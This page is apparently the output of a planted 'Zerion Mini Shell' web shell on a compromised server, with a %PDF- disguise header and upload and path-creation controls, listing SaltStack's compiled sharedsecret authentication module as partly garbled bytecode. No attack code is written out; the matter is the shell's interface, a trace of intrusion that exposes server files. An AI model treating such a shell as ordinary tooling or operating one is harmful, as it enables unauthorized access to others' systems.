%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/lib/python2.7/site-packages/salt/auth/
Upload File :
Create Path :
Current File : //usr/lib/python2.7/site-packages/salt/auth/sharedsecret.pyc

�
���^c@@sJdZddlmZmZmZddlZeje�Zd�Z	dS(uSProvide authentication using configured shared secret

.. code-block:: yaml

    external_auth:
      sharedsecret:
        fred:
          - .*
          - '@jobs'


The shared secret should be added to the master configuration, for
example in /etc/salt/master.d/sharedsecret.conf (make sure that file
is only readable by the user running the master):

.. code-block:: yaml

   sharedsecret: OIUHF_CHANGE_THIS_12h88

This auth module should be used with caution. It was initially
designed to work with a frontal that takes care of authentication (for
example kerberos) and places the shared secret in the HTTP headers to
the salt-api call. This salt-api call should really be done on
localhost to avoid someone eavesdropping on the shared secret.

See the documentation for cherrypy to setup the headers in your
frontal.

.. versionadded:: Beryllium
i(tabsolute_importtprint_functiontunicode_literalsNcC@s|tjd�kS(u&
    Shared secret authentication
    usharedsecret(t__opts__tget(tusernametpassword((s:/usr/lib/python2.7/site-packages/salt/auth/sharedsecret.pytauth(s(
t__doc__t
__future__RRRtloggingt	getLoggert__name__tlogR(((s:/usr/lib/python2.7/site-packages/salt/auth/sharedsecret.pyt<module>s

Zerion Mini Shell 1.0